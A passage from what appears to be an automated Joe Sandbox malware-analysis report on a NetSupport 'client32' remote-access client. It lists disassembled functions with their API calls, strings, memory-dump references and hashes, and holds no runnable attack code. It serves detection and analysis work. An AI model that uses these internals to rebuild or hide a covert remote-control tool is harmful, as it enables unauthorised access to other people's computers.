                                                                                                                                                    • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                                                                    • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                                                                                    Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                                                                                      • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                                                                                      • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                    • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                                                                    • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                                                                                    • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                                                                    • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                                                                                    Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111385E2
                                                                                                                                                      • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                                      • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                                      • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                                      • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                                                                    • _memset.LIBCMT ref: 11138633
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                                                                    • _strrchr.LIBCMT ref: 11138658
                                                                                                                                                    • _free.LIBCMT ref: 111386AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                    • API String ID: 711243594-1270230032
                                                                                                                                                    • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                                                                    • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                                                                    • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                                                                    • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                                                                    Function 6CA87610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 6CA87642
                                                                                                                                                    • connect.WSOCK32(00000000,?,?), ref: 6CA87659
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6CA87660
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA876D3
                                                                                                                                                    • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6CA876F3
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA87717
                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 6CA8775C
                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA87762
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6CA8777A
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6CA8778B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                                    • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                    • API String ID: 4218156244-2969206566
                                                                                                                                                    • Opcode ID: ee71c1577af3e80f93a9a509b08636e47b1b0b7132766e1616fbd74ee4973b1b
                                                                                                                                                    • Instruction ID: e4601db63b6c8ac1c16143196cc9e3b2d8f9d8a1c5809e0d5810b4654e65cc02
                                                                                                                                                    • Opcode Fuzzy Hash: ee71c1577af3e80f93a9a509b08636e47b1b0b7132766e1616fbd74ee4973b1b
                                                                                                                                                    • Instruction Fuzzy Hash: 18410B71A01315ABEB20DBA4CD4CBE973BAAF44304F004599F609E7641EB749ADDCBA1
                                                                                                                                                    Function 11133B00 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 107COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 11133B70
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.su
                                                                                                                                                    • API String ID: 1170620360-2478739915
                                                                                                                                                    • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                                                                    • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                                                                                    • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                                                                    • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                                                                                    Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                                                                      • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                                      • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                                      • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                                      • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                                      • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                                    • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                                                                                    • GetDC.USER32(00000000), ref: 11134E13
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,034909E0,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                    • API String ID: 1594747848-1114959992
                                                                                                                                                    • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                                                                    • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                                                                                    • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                                                                    • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                                                                                    Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strtok.LIBCMT ref: 11027286
                                                                                                                                                    • _strtok.LIBCMT ref: 110272C0
                                                                                                                                                    • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strtok$Sleep
                                                                                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                    • API String ID: 2009458258-3774545468
                                                                                                                                                    • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                                                                    • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                                                                                    • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                                                                    • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                                                                                    Function 6CA88D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6CA967B5), ref: 6CA88D6B
                                                                                                                                                      • Part of subcall function 6CA84F70: LoadLibraryA.KERNEL32(psapi.dll,?,6CA88DC8), ref: 6CA84F78
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6CA88DCB
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6CA88DD8
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6CA88EBF
                                                                                                                                                      • Part of subcall function 6CA84FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CA84FC4
                                                                                                                                                      • Part of subcall function 6CA84FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CA88E0D,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FE4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6CA88EAE
                                                                                                                                                      • Part of subcall function 6CA85000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
                                                                                                                                                      • Part of subcall function 6CA85000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
                                                                                                                                                      • Part of subcall function 6CA82420: _strrchr.LIBCMT ref: 6CA8242E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                                                    • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                                    • API String ID: 2714439535-3484705551
                                                                                                                                                    • Opcode ID: ccf2f491a8907615d6e4b8580a6d83bec60745516d3adfbf29b7e17c021a3b53
                                                                                                                                                    • Instruction ID: e9cb92d1dac2c5c92d054146936bacc042a06925d1aea51032a16a0cdae64de5
                                                                                                                                                    • Opcode Fuzzy Hash: ccf2f491a8907615d6e4b8580a6d83bec60745516d3adfbf29b7e17c021a3b53
                                                                                                                                                    • Instruction Fuzzy Hash: ED41F5B1B012199BEB149B51CD44FEA73B8EB45708F0445A9EA15E7A40EB30EAC9CB71
                                                                                                                                                    Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                                                                    • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                                                                                    • GetLastError.KERNEL32 ref: 11103831
                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1110384F
                                                                                                                                                    Strings
                                                                                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                                                                    • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                    • API String ID: 2036220054-60805735
                                                                                                                                                    • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
